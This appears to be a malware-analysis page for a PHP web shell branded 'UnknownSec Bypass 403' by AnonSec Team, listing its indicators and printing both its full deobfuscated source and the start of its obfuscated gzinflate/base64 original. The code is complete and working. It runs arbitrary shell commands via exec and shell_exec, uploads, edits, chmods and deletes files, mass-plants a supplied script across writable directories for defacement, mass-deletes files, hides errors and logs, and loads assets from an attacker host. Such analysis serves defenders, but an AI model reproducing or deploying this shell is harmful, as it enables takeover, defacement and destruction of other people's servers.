Back to listTags
URLsftp.sh/main/style.css
ftp.sh/AnonSec.jpg
Emailsunknownsec1337@gmail.com
Title" . $_SERVER['HTTP_HOST'] . " - {$▛} 403
Executionexec
shell_exec
Input_GET
_POST
Environmentset_time_limit
error_reporting
php_uname
getcwd
Deobfuscated code
<?php
set_time_limit(0);
error_reporting(0);
@ini_set('error_log', null);
@ini_set('log_errors', 0);
@ini_set('max_execution_time', 0);
@ini_set('output_buffering', 0);
@ini_set('display_errors', 0);
eval /* PHPDeobfuscator eval output */ {
$▛ = 'UnknownSec';
$▘ = "<style>table{display:none;}</style>";
if (isset($_GET['option']) && $_POST['opt'] == 'download') {
header('Content-type: text/plain');
header('Content-Disposition: attachment; filename="' . $_POST['name'] . '"');
echo file_get_contents($_POST['path']);
exit;
}
if (get_magic_quotes_gpc()) {
foreach ($_POST as $key => $value) {
$_POST[$key] = stripslashes($value);
}
}
function ▟($dir, $p)
{
if (isset($_GET['path'])) {
$▚ = $_GET['path'];
} else {
$▚ = getcwd();
}
if (is_writable($▚)) {
return "<font color='green'>" . $p . "</font>";
} else {
return "<font color='red'>" . $p . "</font>";
}
}
function dc($dir, $p)
{
if (isset($_GET['path'])) {
$▚ = $_GET['path'];
} else {
$▚ = getcwd();
}
if (is_writable($▚)) {
return "<font color='green'>" . $p . "</font>";
} else {
return "<font color='red'>" . $p . "</font>";
}
}
function ip()
{
$ipas = '';
if (getenv('HTTP_CLIENT_IP')) {
$ipas = getenv('HTTP_CLIENT_IP');
} else {
if (getenv('HTTP_X_FORWARDED_FOR')) {
$ipas = getenv('HTTP_X_FORWARDED_FOR');
} else {
if (getenv('HTTP_X_FORWARDED')) {
$ipas = getenv('HTTP_X_FORWARDED');
} else {
if (getenv('HTTP_FORWARDED_FOR')) {
$ipas = getenv('HTTP_FORWARDED_FOR');
} else {
if (getenv('HTTP_FORWARDED')) {
$ipas = getenv('HTTP_FORWARDED');
} else {
if (getenv('REMOTE_ADDR')) {
$ipas = getenv('REMOTE_ADDR');
} else {
$ipas = 'IP tidak dikenali';
}
}
}
}
}
}
return $ipas;
}
function ekse()
{
$cmd = "whoami";
$return = "";
$output = "";
$methodArray = array();
//exec()
$return = "";
$output = "";
exec($cmd, $output, $return);
if (strlen($output[0]) > 0 && true) {
$methodArray[] = "exec";
}
//shell_exec()
$return = "";
$output = "";
$output = shell_exec($cmd);
if (strlen($output) > 0) {
$methodArray[] = "shell_exec";
}
return $methodArray;
}
function ekseCMD($cmd, $method)
{
if ($method == "") {
ob_start();
$methodArray = ekse();
ob_end_clean();
if (is_array($methodArray)) {
$method = $methodArray[0];
}
}
switch ($method) {
case "exec":
exec($cmd, $output);
var_dump($output);
break;
case "shell_exec":
echo shell_exec($cmd);
break;
}
}
$cmd = htmlspecialchars($_POST["cmd"]);
$method = htmlspecialchars($_POST["execCMD"]);
function p($file)
{
$p = fileperms($file);
if (($p & 0xc000) == 0xc000) {
$i = 's';
} elseif (($p & 0xa000) == 0xa000) {
$i = 'l';
} elseif (($p & 0x8000) == 0x8000) {
$i = '-';
} elseif (($p & 0x6000) == 0x6000) {
$i = 'b';
} elseif (($p & 0x4000) == 0x4000) {
$i = 'd';
} elseif (($p & 0x2000) == 0x2000) {
$i = 'c';
} elseif (($p & 0x1000) == 0x1000) {
$i = 'p';
} else {
$i = 'u';
}
$i .= $p & 0x100 ? 'r' : '-';
$i .= $p & 0x80 ? 'w' : '-';
$i .= $p & 0x40 ? $p & 0x800 ? 's' : 'x' : ($p & 0x800 ? 'S' : '-');
$i .= $p & 0x20 ? 'r' : '-';
$i .= $p & 0x10 ? 'w' : '-';
$i .= $p & 0x8 ? $p & 0x400 ? 's' : 'x' : ($p & 0x400 ? 'S' : '-');
$i .= $p & 0x4 ? 'r' : '-';
$i .= $p & 0x2 ? 'w' : '-';
$i .= $p & 0x1 ? $p & 0x200 ? 't' : 'x' : ($p & 0x200 ? 'T' : '-');
return $i;
}
echo "\r\n<!DOCTYPE HTML>\r\n<html>\r\n\t<head>\r\n\t\t<meta name='author' content='{$▛}'>\r\n\t\t<meta name='robots' content='NOINDEX, NOFOLLOW'>\r\n\t\t<title>" . $_SERVER['HTTP_HOST'] . " - {$▛} 403</title>\r\n\t\t<meta name='viewport' content='width=device-width, initial-scale=0.70, user-scalable=no'>\r\n\t\t<link rel='stylesheet' href='//unknownsec.ftp.sh/main/style.css'>\r\n\t\t<script src='//maxcdn.bootstrapcdn.com/bootstrap/4.3.1/js/bootstrap.min.js'></script>\r\n\t\t<script src='//cdnjs.cloudflare.com/ajax/libs/limonte-sweetalert2/7.33.1/sweetalert2.min.js'></script>\r\n\t</head>\r\n<body class='bg-secondary text-light'>\r\n<div class='container-fluid'>\r\n\t<div class='py-3' id='main'>\r\n\t\t<div class='box shadow bg-dark p-4 rounded-3'>\r\n\t\t<a class='text-decoration-none text-light' href='" . $_SERVER['PHP_SELF'] . "'><h4>{$▛} Bypass <i class='bi bi-bug-fill'></i> 403</h4></a>";
if (isset($_GET['path'])) {
$path = $_GET['path'];
} else {
$path = getcwd();
}
$path = str_replace('\\', '/', $path);
$paths = explode('/', $path);
foreach ($paths as $id => $pat) {
if ($pat == '' && $id == 0) {
$a = true;
echo "<i class=\"bi bi-hdd-rack\"></i> : <a class=\"text-decoration-none text-light\" href=\"?path=/\">/</a>";
continue;
}
if ($pat == '') {
continue;
}
echo "<a class=\"text-decoration-none\" href=\"?path=";
for ($i = 0; $i <= $id; $i++) {
echo "{$paths[$i]}";
if ($i != $id) {
echo "/";
}
}
echo '">' . $pat . '</a>/';
}
echo " [ " . ▟($path, p($path)) . " ]";
echo "\r\n<div class='dropdown'>\r\n\t<button class='btn btn-outline-light dropdown-toggle btn-sm' type='button' id='dropdownMenuButton' data-toggle='dropdown' aria-haspopup='true' aria-expanded='false'><i class='bi bi-menu-down'></i> Menu</button>\r\n\t<div class='dropdown-menu'>\r\n\t\t<a class='dropdown-item' href='?path={$path}&dir={$path}&id=upload'><i class='bi bi-upload'></i> Upload</a>\r\n\t\t<a class='dropdown-item' href='?path={$path}&dir={$path}&id=depes'><i class='bi bi-exclamation-diamond'></i> Mass depes</a>\r\n\t\t<a class='dropdown-item' href='?path={$path}&dir={$path}&id=delete'><i class='bi bi-trash'></i> Mass delete</a>\r\n\t\t<a class='dropdown-item' href='?path={$path}&dir={$path}&id=cmd'><i class='bi bi-terminal'></i> Terminal</a>\r\n\t\t<a class='dropdown-item' href='?path={$path}&dir={$path}&id=info'><i class='bi bi-info-circle'></i> Info server</a>\r\n\t\t<a class='dropdown-item' href='?path={$path}&dir={$path}&id=about'><i class='bi bi-info'></i> About</a></h5>\r\n\t</div>\r\n</div>";
// tools nya
if (isset($_GET['dir'])) {
$dir = $_GET['dir'];
chdir($dir);
} else {
$dir = getcwd();
}
$dir = str_replace("\\", "/", $dir);
$scdir = explode("/", $dir);
for ($i = 0; $i <= $c_dir; $i++) {
$scdir[$i];
if ($i != $c_dir) {
} elseif ($_GET['id'] == 'depes') {
function mass_kabeh($dir, $namafile, $isi_script)
{
if (is_writable($dir)) {
$dira = scandir($dir);
foreach ($dira as $dirb) {
$dirc = "{$dir}/{$dirb}";
$▚ = $dirc . '/' . $namafile;
if ($dirb === '.') {
file_put_contents($▚, $isi_script);
} elseif ($dirb === '..') {
file_put_contents($▚, $isi_script);
} else {
if (is_dir($dirc)) {
if (is_writable($dirc)) {
echo "[<font color=green>success</font>] {$▚}<br>";
file_put_contents($▚, $isi_script);
$▟ = mass_kabeh($dirc, $namafile, $isi_script);
}
}
}
}
}
}
function mass_biasa($dir, $namafile, $isi_script)
{
if (is_writable($dir)) {
$dira = scandir($dir);
foreach ($dira as $dirb) {
$dirc = "{$dir}/{$dirb}";
$▚ = $dirc . '/' . $namafile;
if ($dirb === '.') {
file_put_contents($▚, $isi_script);
} elseif ($dirb === '..') {
file_put_contents($▚, $isi_script);
} else {
if (is_dir($dirc)) {
if (is_writable($dirc)) {
echo "[<font color=green>success</font>] {$dirb}/{$namafile}<br>";
file_put_contents($▚, $isi_script);
}
}
}
}
}
}
if ($_POST['start']) {
if ($_POST['tipe'] == 'massal') {
echo "<div style='margin: 5px auto; padding: 5px'>";
mass_kabeh($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
echo "</div>";
} elseif ($_POST['tipe'] == 'biasa') {
echo "<div style='margin: 5px auto; padding: 5px'>";
mass_biasa($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
echo "</div>";
}
} else {
echo "<br />{$▘}\r\n<form method='post'>\r\n\t<b>Tipe:</b><br>\r\n<div class='custom-control custom-switch'>\r\n\t<input type='checkbox' id='customSwitch' class='custom-control-input' name='tipe' value='biasa'>\r\n\t<label class='custom-control-label' for='customSwitch'>Biasa</label>\r\n</div>\r\n<div class='custom-control custom-switch'>\r\n\t<input type='checkbox' id='customSwitch1' class='custom-control-input' name='tipe' value='massal'>\r\n\t<label class='custom-control-label' for='customSwitch1'>Massal</label>\r\n</div>\r\n\t<b><i class='bi bi-folder'></i> Lokasi:</b>\r\n\t<input class='form-control' type='text' name='d_dir' value='{$dir}' height='10'>\r\n\t<b><i class='bi bi-file-earmark'></i> File name:</b>\r\n\t<input class='form-control' type='text' name='d_file' placeholder='name file' height='10'>\r\n\t<b><i class='bi bi-file-earmark'></i> Your script:</b>\r\n\t<textarea class='form-control' rows='7' name='script' placeholder='your secript here'></textarea><br />\r\n\t<input type='submit' name='start' value='Go' class='btn btn-outline-light'>\r\n</form>";
}
} elseif ($_GET['id'] == 'info') {
$disfunc = @ini_get("disable_functions");
if (empty($disfunc)) {
$disfc = "<font color=green>NONE</font>";
} else {
$disfc = "<font color=red>{$disfunc}</font>";
}
if (!function_exists('posix_getegid')) {
$user = @get_current_user();
$uid = @getmyuid();
$gid = @getmygid();
$group = "?";
} else {
$uid = @posix_getpwuid(posix_geteuid());
$gid = @posix_getgrgid(posix_getegid());
$user = $uid['name'];
$uid = $uid['uid'];
$group = $gid['name'];
$gid = $gid['gid'];
}
$sm = @ini_get(strtolower("safe_mode")) == 'on' ? "<font color=red>ON</font>" : "<font color=green>OFF</font>";
echo '<br />' . $▘ . '
<div class="container">
<div class="card text-dark">
<div class="card-header">';
echo "<b>Uname: </b><font color=green>" . php_uname() . "</font><br />";
echo "<b>Software: </b><font color=green>" . $_SERVER['SERVER_SOFTWARE'] . "</font><br />";
echo "<b>PHP version: </b><font color=green>PHP_VERSION</font> <b>PHP os:</b> <font color=green>PHP_OS</font><br />";
echo "<b>Server Ip: </b><font color=green>" . gethostbyname($_SERVER['HTTP_HOST']) . "</font><br />";
echo "<b>Your Ip: </b><font color=green>" . ip() . "</font><br />";
echo "<b>User: </b><font color=green>{$user}</font> ({$uid}) | <b>Group:</b> <font color=green>{$group}</font> ({$gid})<br />";
echo "<b>Safe Mode: </b>{$sm}<br />";
echo "<kbd>Disable Function:</kbd><pre>{$disfc}</pre>";
echo "</div>\r\n\t</div>\r\n</div>";
} elseif ($_GET['id'] == 'about') {
echo '<br />' . $▘ . '
<div class="container">
<div class="card text-dark">
<div class="card-header">';
echo "<img alt='AnonSec Team' class='img-thumbnail rounded mx-auto d-block' src='//unknownsec.ftp.sh/AnonSec.jpg' width='150px'>";
echo "<b>- About Me -</b><br />";
echo "Thanks bre dah pake shell nya, jika ada yang error silahkan hubungi email di bawah.<br />Greetz : <a href=''>{ AnonSec Team } - And You</a><br />My email: <a href='mailto:unknownsec1337@gmail.com'>unknownsec1337@gmail.com</a>";
echo "</div>\r\n\t</div>\r\n</div>";
} elseif ($_GET['id'] == 'cmd') {
echo "{$▘}<br>\r\n<form method='POST'>\r\n<div class='input-group mb-3'>\r\n\t<input class='form-control' type='text' name='cmd' value='{$cmd}'>\r\n\t<select class='bg-dark text-light form-control' name='execCMD'>\r\n\t\t<option>{$method}</option>";
ob_start();
$methodArray = ekse();
ob_end_clean();
foreach ($methodArray as $value) {
echo "<option>{$value}</option>";
}
echo "</select>\r\n\t</div>\r\n</form>";
if ($cmd == "") {
echo "\r\n<div class='card text-dark'>\r\n\t<div class='card-header'>\r\n\t\t<pre>";
ekseCMD("whoami", $method);
echo "</pre>\r\n\t</div>\r\n</div>";
} else {
echo "\r\n<div class='card text-dark'>\r\n\t<div class='card-header'>\r\n\t\t<pre><kbd>~\$ " . $cmd . "</kbd><br>";
ekseCMD($cmd, $method);
echo "</pre>\r\n\t</div>\r\n</div>";
}
} elseif ($_GET['id'] == 'upload') {
echo '<br />' . $▘ . '
<form action="" method="post" enctype="multipart/form-data">
<div class="input-group mb-3 text-center">
<input type="file" class="form-control form-control-sm" name="file">
<button type="submit" class="btn btn-outline-light btn-sm">Submit</button>
</div>
</form>';
if (isset($_FILES['file'])) {
if (copy($_FILES['file']['tmp_name'], $path . '/' . $_FILES['file']['name'])) {
echo '
<script type="text/javascript">
Swal.fire(
"Success",
"Success upload",
"success"
).then((btnClick) => {if(btnClick){document.location.href="?path=' . $path . '"}})</script>
';
} else {
echo '
<script type="text/javascript">
Swal.fire(
"Opsss",
"Failed upload",
"error"
).then((btnClick) => {if(btnClick){document.location.href="?path=' . $path . '"}})</script>
';
}
}
} elseif ($_GET['id'] == 'delete') {
function hapus_massal($dir, $namafile)
{
if (is_writable($dir)) {
$dira = scandir($dir);
foreach ($dira as $dirb) {
$dirc = "{$dir}/{$dirb}";
$▚ = $dirc . '/' . $namafile;
if ($dirb === '.') {
if (file_exists("{$dir}/{$namafile}")) {
unlink("{$dir}/{$namafile}");
}
} elseif ($dirb === '..') {
if (file_exists("" . dirname($dir) . "/{$namafile}")) {
unlink("" . dirname($dir) . "/{$namafile}");
}
} else {
if (is_dir($dirc)) {
if (is_writable($dirc)) {
if (file_exists($▚)) {
echo "[<font color=green>deleted</font>] {$▚}<br>";
unlink($▚);
$▟ = hapus_massal($dirc, $namafile);
}
}
}
}
}
}
}
if ($_POST['start']) {
echo "<div style='margin: 5px auto; padding: 5px'>";
hapus_massal($_POST['d_dir'], $_POST['d_file']);
echo "</div>";
} else {
echo "<br />{$▘}\r\n<form method='post'>\r\n\t<b><i class='bi bi-folder'></i> Lokasi:</b>\r\n\t<input class='form-control' type='text' name='d_dir' value='{$dir}' height='10'>\r\n\t<b><i class='bi bi-file-earmark'></i> File name:</b>\r\n\t<div class='input-group mb-3'>\r\n\t<input class='form-control' type='text' name='d_file' placeholder='name file' height='10'><br>\r\n\t<div class='input-group-append'>\r\n\t<input class='btn btn-outline-light' type='submit' name='start' value='Go'>\r\n</form>\r\n\t</div>\r\n\t</div>";
}
}
}
// akhir tools
if (isset($_GET['filesrc'])) {
echo "<br><b>name : </b>" . basename($_GET['filesrc']);
"</br>";
echo '<textarea class="form-control" rows="7" readonly> ' . htmlspecialchars(file_get_contents($_GET['filesrc'])) . '</textarea><br />';
} elseif (isset($_GET['option']) && $_POST['opt'] != 'delete') {
echo '<br><b>name : </b>' . basename($_POST['path']);
'</br>';
//Chmod
if ($_POST['opt'] == 'chmod') {
if (isset($_POST['perm'])) {
if (chmod($_POST['path'], $_POST['perm'])) {
echo '
<script type="text/javascript">
Swal.fire(
"Success",
"Success Change Permission",
"success"
).then((btnClick) => {if(btnClick){document.location.href="?path=' . $path . '"}})</script>
';
} else {
echo '
<script type="text/javascript">
Swal.fire(
"Opsss",
"Failed change permission",
"error"
).then((btnClick) => {if(btnClick){document.location.href="?path=' . $path . '"}})</script>
';
}
}
echo '<form method="POST">
<div class="input-group mb-3">
<input class="form-control" name="perm" type="text" value="' . substr(sprintf('%o', fileperms($_POST['path'])), -4) . '"/>
<input class="form-control" type="hidden" name="path" value="' . $_POST['path'] . '">
<input class="form-control" type="hidden" name="opt" value="chmod">
<div class="input-group-append">
<input class="btn btn-outline-light" type="submit" value="Go"/>
</form>
</div>
</div>';
} elseif ($_GET['opt'] == 'btw') {
$cwd = getcwd();
echo '<form action="?option&path=' . $cwd . '&opt=delete&type=buat" method="POST">
<div class="input-group mb-3">
<input class="form-control" name="name" type="text" value="Folder"/>
<input class="form-control" type="hidden" name="path" value="' . $cwd . '">
<input class="form-control" type="hidden" name="opt" value="delete">
<div class="input-group-append">
<input class="btn btn-outline-light" type="submit" value="Go"/>
</form>
</div>
</div>';
} elseif ($_POST['opt'] == 'rename') {
if (isset($_POST['newname'])) {
if (rename($_POST['path'], $path . '/' . $_POST['newname'])) {
echo '
<script type="text/javascript">
Swal.fire(
"Success",
"Success change name",
"success"
).then((btnClick) => {if(btnClick){document.location.href="?path=' . $path . '"}})</script>
';
} else {
echo '
<script type="text/javascript">
Swal.fire(
"Opsss",
"Failed change name",
"error"
).then((btnClick) => {if(btnClick){document.location.href="?path=' . $path . '"}})</script>
';
}
$_POST['name'] = $_POST['newname'];
}
echo '<form method="POST">
<div class="input-group mb-3">
<input class="form-control" name="newname" type="text" value="' . $_POST['name'] . '" />
<input class="form-control" type="hidden" name="path" value="' . $_POST['path'] . '">
<input class="form-control" type="hidden" name="opt" value="rename">
<div class="input-group-append">
<input class="btn btn-outline-light" type="submit" value="Go"/>
</form>
</div>
</div>';
} elseif ($_POST['opt'] == 'edit') {
if (isset($_POST['src'])) {
$fp = fopen($_POST['path'], 'w');
if (fwrite($fp, $_POST['src'])) {
echo '
<script type="text/javascript">
Swal.fire(
"Success",
"Edit file Success",
"success"
).then((btnClick) => {if(btnClick){document.location.href="?path=' . $path . '"}})</script>
';
} else {
echo '
<script type="text/javascript">
Swal.fire(
"Opsss",
"Failed edit file",
"error"
).then((btnClick) => {if(btnClick){document.location.href="?path=' . $path . '"}})</script>
';
}
fclose($fp);
}
echo '<form method="POST">
<textarea class="form-control" rows="7" name="src">' . htmlspecialchars(file_get_contents($_POST['path'])) . '</textarea><br />
<input class="form-control" type="hidden" name="path" value="' . $_POST['path'] . '">
<input class="form-control" type="hidden" name="opt" value="edit">
<input class="btn btn-outline-light" type="submit" value="Go"/>
</form><br />';
}
} else {
//delete dir
if (isset($_GET['option']) && $_POST['opt'] == 'delete') {
if ($_POST['type'] == 'dir') {
if (rmdir($_POST['path'])) {
echo '
<script type="text/javascript">
Swal.fire(
"Success",
"Success delete dir",
"success"
).then((btnClick) => {if(btnClick){document.location.href="?path=' . $path . '"}})</script>
';
} else {
echo '
<script type="text/javascript">
Swal.fire(
"Opsss",
"Failed delete dir",
"error"
).then((btnClick) => {if(btnClick){document.location.href="?path=' . $path . '"}})</script>
';
}
} elseif ($_POST['type'] == 'file') {
if (unlink($_POST['path'])) {
echo '
<script type="text/javascript">
Swal.fire(
"Success",
"Success delete file",
"success"
).then((btnClick) => {if(btnClick){document.location.href="?path=' . $path . '"}})</script>
';
} else {
echo '
<script type="text/javascript">
Swal.fire(
"Opsss",
"Failed delete file",
"error"
).then((btnClick) => {if(btnClick){document.location.href="?path=' . $path . '"}})</script>
';
}
}
}
echo "</center>";
$scandir = scandir($path);
$pa = getcwd();
echo "<div class=\"table-responsive\">\r\n<table class=\"table table-hover table-dark text-light\">\r\n<thead>\r\n<tr>\r\n\t<td class=\"text-center\">Name</td>\r\n\t\t<td class=\"text-center\">Last edit</td>\r\n\t\t<td class=\"text-center\">Size</td>\r\n\t\t<td class=\"text-center\">Permission</td>\r\n\t<td class=\"text-center\">Options</td>\r\n</tr>\r\n</thead>\r\n<tbody class=\"text-nowrap\">";
foreach ($scandir as $dir) {
$dt = date("Y-m-d", filemtime("{$path}/{$dir}"));
if (!is_dir("{$path}/{$dir}") || $dir == '.' || $dir == '..') {
continue;
}
echo "\r\n\t<tr>\r\n\t<td><i class='bi bi-folder-fill'></i><a class='text-decoration-none text-secondary' href=\"?path={$path}/{$dir}\">{$dir}</a></td>\r\n\t<td><center>{$dt}</center></td>\r\n\t<td><center>DIR</center></td>\r\n\t<td><center>";
if (is_writable("{$path}/{$dir}")) {
echo "<font color=\"green\">";
} elseif (!is_readable("{$path}/{$dir}")) {
echo "<font color=\"red\">";
}
echo p("{$path}/{$dir}");
if (is_writable("{$path}/{$dir}") || !is_readable("{$path}/{$dir}")) {
echo "</font>";
}
echo "</center></td>\r\n\t<td>\r\n<form method=\"POST\" action=\"?option&path={$path}\">\r\n<div class='input-group mb-3 text-center'>\r\n<select class=\"form-select form-select-sm\" name=\"opt\">\r\n\t<option selected disabled>Select</option>\r\n\t<option value=\"delete\">Delete</option>\r\n\t<option value=\"chmod\">Chmod</option>\r\n\t<option value=\"rename\">Rename</option>\r\n</select>\r\n\t<input type=\"hidden\" name=\"type\" value=\"dir\">\r\n<input type=\"hidden\" name=\"name\" value=\"{$dir}\">\r\n\t<input type=\"hidden\" name=\"path\" value=\"{$path}/{$dir}\">\r\n\t\t<input class=\"btn btn-outline-light btn-sm\" type=\"submit\" value=\"Go\"/>\r\n\t</form>\r\n</div>\r\n</td>\r\n</tr>";
}
foreach ($scandir as $file) {
$ft = date("Y-m-d", filemtime("{$path}/{$file}"));
if (!is_file($path . '/' . $file)) {
continue;
}
$s = filesize($path . '/' . $file) / 1024;
$s = round($s, 3);
if ($s >= 1024) {
$s = round($s / 1024, 2) . ' MB';
} else {
$s .= ' KB';
}
echo "\r\n\t<tr>\r\n\t<td><i class='bi bi-file-earmark-code-fill'></i><a class='text-decoration-none text-secondary' href=\"?filesrc={$path}/{$file}&path={$path}\">{$file}</a></td>\r\n\t<td><center>{$ft}</center></td>\r\n\t<td><center>{$s}</center></td>\r\n\t<td><center>";
if (is_writable("{$path}/{$file}")) {
echo "<font color=\"green\">";
} elseif (!is_readable("{$path}/{$file}")) {
echo "<font color=\"red\">";
}
echo p("{$path}/{$file}");
if (is_writable("{$path}/{$file}") || !is_readable("{$path}/{$file}")) {
echo "</font>";
}
echo "</center></td>\r\n\t<td>\r\n<form method=\"POST\" action=\"?option&path={$path}\">\r\n<div class='input-group mb-3 text-center'>\r\n<select class=\"form-select form-select-sm\"name=\"opt\">\r\n\t<option selected disabled>Select</option>\r\n\t\t<option value=\"delete\">Delete</option>\r\n\t\t<option value=\"edit\">Edit</option>\r\n\t\t<option value=\"rename\">Rename</option>\r\n\t\t<option value=\"chmod\">Chmod</option>\r\n\t<option value=\"download\">Download</option>\r\n</select>\r\n<input type=\"hidden\" name=\"type\" value=\"file\">\r\n\t<input type=\"hidden\" name=\"name\" value=\"{$file}\">\r\n\t\t<input type=\"hidden\" name=\"path\" value=\"{$path}/{$file}\">\r\n\t\t<input class=\"btn btn-outline-light btn-sm\" type=\"submit\" value=\"Go\"/>\r\n\t</form>\r\n</div>\r\n</td>\r\n</tr>";
}
}
echo "\r\n</tbody>\r\n</table>\r\n<div class='text-center'>\r\n\t<kbd>Copyright © " . date("Y") . " - {$▛}</kbd>\r\n</div>\r\n\t</div>\r\n\t\t</div>\r\n\t</div>\r\n</div>\r\n<script src='//code.jquery.com/jquery-3.3.1.slim.min.js'></script>\r\n<script src='//cdnjs.cloudflare.com/ajax/libs/popper.js/1.14.7/umd/popper.min.js'></script>\r\n<script src='//stackpath.bootstrapcdn.com/bootstrap/4.3.1/js/bootstrap.min.js'></script>\r\n</body>\r\n</html>";
};
Original code
<?php
set_time_limit(0);
error_reporting(0);
@ini_set('error_log',null);
@ini_set('log_errors',0);
@ini_set('max_execution_time',0);
@ini_set('output_buffering',0);
@ini_set('display_errors', 0);
eval(gzinflate(base64_decode('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